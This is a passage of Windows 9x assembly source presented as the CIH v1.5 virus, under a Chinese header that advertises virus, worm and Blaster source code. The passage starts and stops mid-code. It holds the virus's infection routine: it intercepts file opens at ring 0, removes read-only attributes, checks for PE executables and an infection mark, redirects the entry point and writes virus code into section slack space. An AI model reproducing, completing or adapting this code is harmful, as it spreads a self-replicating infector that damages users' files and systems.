cih v1.5源程序.txt

病毒源码 包括世上第一个病毒源码、蠕虫源码、冲击波源码

; * to a Normal Pathname in the       *
; * Specified BCS Character Set.      *
; *************************************

CallUniToBCSPath:
push 00000000h
push FileNameBufferSize
mov ebx, [ebx+10h]
mov eax, [ebx+0ch]
add eax, 04h
push eax
push esi
int 20h ; VXDCall UniToBCSPath
UniToBCSPath = $
dd 00400041h
add esp, 04h*04h

; *************************************
; * Is FileName '.EXE' !?             *
; *************************************

cmp [esi+eax-04h], 'EXE.'
pop esi
jne DisableOnBusy

IF DEBUG

; *************************************
; * Only for Debug                    *
; *************************************

cmp [esi+eax-06h], 'KCUF'
jne DisableOnBusy

ENDIF

; *************************************
; * Is Open Existing File !?          *
; *************************************

; if ( NotOpenExistingFile )
; goto DisableOnBusy
cmp word ptr [ebx+18h], 01h
jne DisableOnBusy

; *************************************
; * Get Attributes of the File        *
; *************************************

mov ax, 4300h
int 20h ; VXDCall IFSMgr_Ring0_FileIO
IFSMgr_Ring0_FileIO = $
dd 00400032h
jc DisableOnBusy
push ecx

; *************************************
; * Get IFSMgr_Ring0_FileIO Address   *
; *************************************

mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi]
mov edi, [edi]

; *************************************
; * Is Read-Only File !?              *
; *************************************

test cl, 01h
jz OpenFile

; *************************************
; * Modify Read-Only File to Write    *
; *************************************

mov ax, 4301h
xor ecx, ecx
call edi ; VXDCall IFSMgr_Ring0_FileIO

; *************************************
; * Open File                         *
; *************************************

OpenFile:
xor eax, eax
mov ah, 0d5h
xor ecx, ecx
xor edx, edx
inc edx
mov ebx, edx
inc ebx
call edi ; VXDCall IFSMgr_Ring0_FileIO
xchg ebx, eax ; mov ebx, FileHandle

; *************************************
; * Need to Restore                   *
; * Attributes of the File !?         *
; *************************************

pop ecx
pushf
test cl, 01h
jz IsOpenFileOK

; *************************************
; * Restore Attributes of the File    *
; *************************************

mov ax, 4301h
call edi ; VXDCall IFSMgr_Ring0_FileIO

; *************************************
; * Is Open File OK !?                *
; *************************************

IsOpenFileOK:
popf
jc DisableOnBusy

; *************************************
; * Open File Already Succeed.   ^__^ *
; *************************************

push esi ; Push FileNameBuffer Address to Stack

pushf ; Now CF = 0, Push Flag to Stack

add esi, DataBuffer-@7 ; mov esi, offset DataBuffer

; ***************************
; * Get OffsetToNewHeader   *
; ***************************

xor eax, eax
mov ah, 0d6h
; For Doing Minimal VirusCode's Length,
; I Save EAX to EBP.
mov ebp, eax
push 00000004h
pop ecx
push 0000003ch
pop edx
call edi ; VXDCall IFSMgr_Ring0_FileIO
mov edx, [esi]

; ***************************
; * Get 'PE\0' Signature    *
; * of ImageFileHeader, and *
; * Infected Mark.          *
; ***************************

dec edx
mov eax, ebp
call edi ; VXDCall IFSMgr_Ring0_FileIO

; ***************************
; * Is PE !?                *
; ***************************
; * Is the File             *
; * Already Infected !?     *
; ***************************
; * WinZip Self-Extractor   *
; * doesn't Have Infected   *
; * Mark Because My Virus   *
; * doesn't Infect it.      *
; ***************************

cmp dword ptr [esi], 00455000h
jne CloseFile

; *************************************
; * The File is                   ^o^ *
; * PE(Portable Executable) indeed.   *
; *************************************
; * The File isn't also Infected.     *
; *************************************

; *************************************
; * Start to Infect the File          *
; *************************************
; * Registers Use Status Now :        *
; *                                   *
; * EAX = 04h                         *
; * EBX = File Handle                 *
; * ECX = 04h                         *
; * EDX = 'PE\0\0' Signature of       *
; *       ImageFileHeader Pointer's   *
; *   Former Byte.                *
; * ESI = DataBuffer Address ==> @8   *
; * EDI = IFSMgr_Ring0_FileIO Address *
; * EBP = D600h ==> Read Data in File *
; *************************************
; * Stack Dump :                      *
; *                                   *
; * ESP => -------------------------  *
; *        |       EFLAG(CF=0)     |  *
; *        -------------------------  *
; *        | FileNameBufferPointer |  *
; *        -------------------------  *
; *        |          EDI          |  *
; *        -------------------------  *
; *        |          ESI          |  *
; *        -------------------------  *
; *        |          EBP          |  *
; *        -------------------------  *
; *        |          ESP          |  *
; *        -------------------------  *
; *        |          EBX          |  *
; *        -------------------------  *
; *        |          EDX          |  *
; *        -------------------------  *
; *        |          ECX          |  *
; *        -------------------------  *
; *        |          EAX          |  *
; *        -------------------------  *
; *        |     Return Address    |  *
; *        -------------------------  *
; *************************************

push ebx ; Save File Handle
push 00h ; Set VirusCodeSectionTableEndMark

; ***************************
; * Let's Set the           *
; * Virus' Infected Mark    *
; ***************************

push 01h ; Size
push edx ; Pointer of File
push edi ; Address of Buffer

; ***************************
; * Save ESP Register       *
; ***************************

mov dr1, esp

; ***************************
; * Let's Set the           *
; * NewAddressOfEntryPoint  *
; * ( Only First Set Size ) *
; ***************************

push eax ; Size

; ***************************
; * Let's Read              *
; * Image Header in File    *
; ***************************

mov eax, ebp
mov cl, SizeOfImageHeaderToRead
add edx, 07h ; Move EDX to NumberOfSections
call edi  ; VXDCall IFSMgr_Ring0_FileIO

; ***************************
; * Let's Set the           *
; * NewAddressOfEntryPoint  *
; * ( Set Pointer of File,  *
; *   Address of Buffer   ) *
; ***************************

lea eax, (AddressOfEntryPoint-@8)[edx]
push eax ; Pointer of File
lea eax, (NewAddressOfEntryPoint-@8)[esi]
push eax ; Address of Buffer

; ***************************
; * Move EDX to the Start   *
; * of SectionTable in File *
; ***************************

movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi]
lea edx, [eax+edx+12h]

; ***************************
; * Let's Get               *
; * Total Size of Sections  *
; ***************************

mov al, SizeOfScetionTable
; I Assume NumberOfSections <= 0ffh
mov cl, (NumberOfSections-@8)[esi]
mul cl

; ***************************
; * Let's Set Section Table *
; ***************************

; Move ESI to the Start of SectionTable
lea esi, (StartOfSectionTable-@8)[esi]
push eax ; Size
push edx ; Pointer of File
push esi ; Address of Buffer

; ***************************
; * The Code Size of Merge  *
; * Virus Code Section and  *
; * Total Size of Virus     *
; * Code Section Table Must *
; * be Small or Equal the   *
; * Unused Space Size of    *
; * Following Section Table *
; ***************************

inc ecx
push ecx ; Save NumberOfSections+1
shl ecx, 03h
push ecx ; Save TotalSizeOfVirusCodeSectionTable

add ecx, eax
add ecx, edx
sub ecx, (SizeOfHeaders-@9)[esi]
not ecx
inc ecx
; Save My Virus First Section Code
; Size of Following Section Table...
; ( Not Include the Size of Virus Code Section Table )
push ecx
xchg ecx, eax ; ECX = Size of Section Table
; Save Original Address of Entry Point
mov eax, (AddressOfEntryPoint-@9)[esi]
add eax, (ImageBase-@9)[esi]
mov (OriginalAddressOfEntryPoint-@9)[esi], eax
cmp word ptr [esp], small CodeSizeOfMergeVirusCodeSection
jl OnlySetInfectedMark

; ***************************
; * Read All Section Tables *
; ***************************

mov eax, ebp
call edi ; VXDCall IFSMgr_Ring0_FileIO

; ***************************
; * Full Modify the Bug :   *
; * WinZip Self-Extractor   *
; * Occurs Error...         *
; ***************************
; * So When User Opens      *
; * WinZip Self-Extractor,  *
; * Virus Doesn't Infect it.*
; ***************************
; * First, Virus Gets the   *
; * PointerToRawData in the *
; * Second Section Table,   *
; * Reads the Section Data, *
; * and Tests the String of *
; * 'WinZip(R)'......       *
; ***************************

xchg eax, ebp
push 00000004h
pop ecx
push edx
mov edx, (SizeOfScetionTable+PointerToRawData-@9)[esi]
add edx, 12h
call edi ; VXDCall IFSMgr_Ring0_FileIO
                        cmp     dword ptr [esi], 'piZniW'
je NotSetInfectedMark
pop edx

; ***************************
; * Let's Set Total Virus   *
; * Code Section Table      *
; ***************************

; EBX = My Virus First Section Code
; Size of Following Section Table
pop ebx
pop edi ; EDI = TotalSizeOfVirusCodeSectionTable
pop ecx ; ECX = NumberOfSections+1
push edi ; Size
add edx, ebp
push edx ; Pointer of File
add ebp, esi
push ebp ; Address of Buffer

; ***************************
; * Set the First Virus     *
; * Code Section Size in    *
; * VirusCodeSectionTable   *
; ***************************

lea eax, [ebp+edi-04h]
mov [eax], ebx

; ***************************
; * Let's Set My Virus      *
; * First Section Code      *
; ***************************

push ebx ; Size
add edx, edi
push edx ; Pointer of File
lea edi, (MyVirusStart-@9)[esi]
push edi ; Address of Buffer

; ***************************
; * Let's Modify the        *
; * AddressOfEntryPoint to  *
; * My Virus Entry Point    *
; ***************************

mov (NewAddressOfEntryPoint-@9)[esi], edx

; ***************************
; * Setup Initial Data      *
; ***************************

lea edx, [esi-SizeOfScetionTable]
mov ebp, offset VirusSize
jmp StartToWriteCodeToSections

; ***************************
; * Write Code to Sections  *
; ***************************

LoopOfWriteCodeToSections:

add edx, SizeOfScetionTable
mov ebx, (SizeOfRawData-@9)[edx]
sub ebx, (VirtualSize-@9)[edx]
jbe EndOfWriteCodeToSections
push ebx ; Size
sub eax, 08h
mov [eax], ebx
mov ebx, (PointerToRawData-@9)[edx]
add ebx, (VirtualSize-@9)[edx]
push ebx ; Pointer of File
push edi ; Address of Buffer
mov ebx, (VirtualSize-@9)[edx]
add ebx, (VirtualAddress-@9)[edx]
add ebx, (ImageBase-@9)[esi]
mov [eax+4], ebx
mov ebx, [eax]
add (VirtualSize-@9)[edx], ebx

; Section contains initialized data ==> 00000040h
; Section can be Read.              ==> 40000000h
or (Characteristics-@9)[edx], 40000040h

StartToWriteCodeToSections:

sub ebp, ebx
jbe SetVirusCodeSectionTableEndMark
add edi, ebx ; Move Address of Buffer

EndOfWriteCodeToSections:

loop LoopOfWriteCodeToSections

; ***************************
; * Only Set Infected Mark  *
; ***************************

OnlySetInfectedMark:
mov esp, dr1
jmp WriteVirusCodeToFile

; ***************************
; * Not Set Infected Mark   *
; ***************************

NotSetInfectedMark:
add esp, 3ch
jmp CloseFile

; ***************************